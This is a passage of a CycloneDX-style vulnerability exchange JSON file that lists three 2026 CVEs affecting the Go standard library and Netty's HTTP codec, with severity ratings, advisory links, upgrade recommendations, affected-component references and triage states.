      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-33811",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        415
      ],
      "description": "When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33811"
        },
        {
          "url": "https://go.dev/cl/767860"
        },
        {
          "url": "https://go.dev/issue/78803"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4981"
        }
      ],
      "published": "2026-05-07T20:16:42+00:00",
      "updated": "2026-05-12T20:23:02+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33814",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33814"
        },
        {
          "url": "https://go.dev/cl/761581"
        },
        {
          "url": "https://go.dev/cl/761640"
        },
        {
          "url": "https://go.dev/issue/78476"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33814"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4918"
        }
      ],
      "published": "2026-05-07T20:16:42+00:00",
      "updated": "2026-05-08T19:16:30+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33870",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.1.132.Final, 4.2.10.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33870"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33870"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
        },
        {
          "url": "https://w4ke.info/2025/06/18/funky-chunks.html"
        },
        {
          "url": "https://w4ke.info/2025/10/29/funky-chunks-2.html"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110"
        }
      ],
      "published": "2026-03-27T20:16:34+00:00",
      "updated": "2026-03-30T20:12:16+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
